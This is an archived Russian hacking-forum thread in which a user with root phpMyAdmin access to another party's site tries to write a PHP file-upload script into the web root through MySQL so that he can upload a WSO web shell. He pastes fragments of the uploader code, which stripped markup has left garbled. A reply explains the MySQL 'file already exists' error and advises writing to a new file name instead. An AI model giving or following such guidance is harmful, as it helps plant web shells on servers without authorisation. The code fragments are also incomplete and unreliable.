PDA

Просмотр полной версии : Upoad shell wso через phphmyadmin

SGskam
01.03.2014, 22:22
http://yadi.sk/d/Ez4guzZ9JkuAy

вот ссылка на видео так сказать с наглядной проблемой

Значит непосредственно перейдём к проблеме

У меня есть доступ к phpmyadmin root пользователю

Я значит создаю новую базу, таблицу и вписываю туда такой код









ZaraByte File Uploader







setUploadLocation(getcwd().DIRECTORY_SEPARATOR);

$myUpload->uploadFile();

?>

uploadLocation = getcwd().DIRECTORY_SEPARATOR;

}

/**

* This function sets the directory where to upload the file

* In case of Windows server use the form: c:\\temp\\

* In case of Unix server use the form: /tmp/

*

* @param String Directory where to store the files

*/

function setUploadLocation($dir){

$this->uploadLocation = $dir;

}

function showUploadForm($msg='',$error=''){

?>





ZaraByte's File Uploader



'.$msg.'';

} else if ($error != ''){

echo ''.$error.'';

}

?>





File:

















ZaraByte File Uploader



showUploadForm();

} else {

$msg = '';

$error = '';

//Check destination directory

if (!file_exists($this->uploadLocation)){

$error = "The target directory doesn't exists!";

} else if (!is_writeable($this->uploadLocation)) {

$error = "The target directory is not writeable!";

} else {

$target_path = $this->uploadLocation . basename( $_FILES['myfile']['name']);

if(@move_uploaded_file($_FILES['myfile']['tmp_name'], $target_path)) {

$msg = basename( $_FILES['myfile']['name']).

" was uploaded successfully!";

} else{

$error = "The upload process failed!";

}

}

$this->showUploadForm($msg,$error);

}

}

}

?>



на видео видно

и у меня не выполняется sql запрос с помошью которого из созданой мною таблицей с кодо, чтобы это всё дело добавилось к дырявой странице и я мог залить шелл

помогите решить проблему пожалста
Gorev
01.03.2014, 23:19
https://rdot.org/forum/showthread.php?t=347
Gorev
01.03.2014, 23:22
qaz said:
можно вопрос, а нахрена пихать в запись колонки этот код?


Видео не смотрел, но судя по тому как он пытается через пыху шелл ливануть, его и не стоит смотреть
SGskam
02.03.2014, 17:34
#1086 - File '/var/www/siltd/units/base.php' already exists пишет при заливке мини-шелла
SGskam
02.03.2014, 17:43
прикол этого кода в том что если удастся его добавить к коду дырявой страницы

то есть http://www.хххххх.ru/units/base.php то там появится upload

для лучшего понятия ситуации советую посмотреть видео
totenkopf
13.03.2014, 21:36
Вы пытаетесь добавить код к существующему файлу?

Mysql такого не умеет.

Создавайте новый файл.

В тексте ошибки же написано "файл уже существует".

Попробуйте сохранить скажем в "/var/www/siltd/units/base2.php"

Если хватит прав все будет отлично.